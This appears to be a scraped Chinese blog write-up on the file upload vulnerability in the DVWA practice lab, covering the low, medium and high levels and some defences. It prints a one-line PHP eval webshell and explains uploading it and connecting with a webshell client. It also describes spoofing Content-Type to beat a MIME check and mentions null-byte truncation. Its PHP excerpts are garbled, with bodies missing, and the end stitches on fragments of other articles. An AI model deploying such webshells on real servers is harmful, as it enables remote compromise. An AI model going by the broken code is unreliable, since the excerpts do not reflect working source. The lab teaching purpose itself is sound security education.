檔案上傳漏洞 OWASP DVWA

2021-10-08 06:22:30 字數 1942 閱讀 2062

0x03 如何防禦檔案上傳漏洞

對於常見的web應用系統都有檔案上傳的需求,比如第一次進行四六級考試報名需要註冊賬號時,會讓我們上傳自己的大頭照。當編寫該web應用程式的開發者在實現檔案上傳功能時,如果沒有做一些安全措施與限制,那麼惡意使用者就可能上傳一些指令碼(木馬),利用木馬可以就可以進一步控制對方的計算機從而進行非法利用。我們就說這樣的web應用程式就存在檔案上傳漏洞。

**審計

<?phpif (

isset

($_post

['upload'])

)else

}?>

這段**實現了乙個簡單的檔案上傳功能,顯然沒有做任何的安全措施,存在任意檔案上傳漏洞,可以直接上傳乙個木馬檔案。由於該web應用是php開發的,所以應該寫乙個php的木馬檔案。

shell.php

<?php @eval

($_post

['badlulner'])

?>

直接上傳shell.php

要利用這個木馬,我們需要知道這個木馬的路徑,當然測試環境直接給出了木馬路徑。

知道了木馬的路徑,就可以使用木馬利用工具蟻劍連線這個木馬。

連線成功

**審計

<?phpif (

isset

($_post

['upload'])

)else

}else

}?>

相比low等級,medium等級加了乙個判斷

if((

$uploaded_type

=="image/jpeg")&&

($uploaded_size

<

100000))

// 1. 上傳的檔案的mime型別必須是image/jpeg

// 2.上傳檔案的大小不能超過100000kb

繞過思路:

1.抓請求包修改content-type為:image/jpeg

2.上傳馬

<?phpif (

isset

($_post

['upload'])

)else

}else

}?>

分析:

)// 防禦措施為白名單

// 只允許上傳檔案字尾為jpg,jpeg,jpeg,jpg的

由於上傳的檔案只能是jpg型別的,一般情況下,jpg是當作jpg解析和php無關,因此指令碼也就無法利用。

漏洞利用思路:

1.web應用程式存在檔案包含漏洞

2.php版本存在00%截斷

1.安裝web應用防火牆

2.設定白名單,和high等級類似。

3.設定上傳目錄php檔案的許可權為不可執行。

檔案上傳漏洞

php語言 form表單 tmp臨時目錄 file 判斷檔案資訊 臨時檔案放入想要放的位置 移動臨時檔案 1.伺服器配置不當 2.開源編輯器上傳漏洞 3.本地檔案上傳限制被繞過 4.過濾不嚴或被繞過 5.檔案解析漏洞導致檔案執行 6.檔案上傳路徑 1.前段解析指令碼語言 2.允許上傳指令碼檔案 3....

檔案上傳漏洞

什麼是檔案上傳 一些web應用程式中允許上傳,文字或者其他資源到指定的位置,檔案上傳漏洞就是利用這些可以上傳的地方將惡意 植入到伺服器中,再通過url去訪問以執行 webshell 以web 方式進行通訊的命令直譯器,也叫 後門。本質上講,webshell 就是乙個能夠執行指令碼命令的檔案,其形式可...

檔案上傳漏洞

檔案上傳漏洞的概述 上傳漏洞的危害 檔案上傳漏洞的利用 檔案上傳漏洞的防禦 1 背景 什麼是檔案上傳 為什麼會有檔案上傳 在 運營過程中,不可避免地要對 的某些頁面或者內容進行更新,這個時候需要使用到 的檔案上傳功能。如果不對被上傳的檔案進行限制或者限制被繞過,該功能便有可能會被利用上傳可執行檔案 ...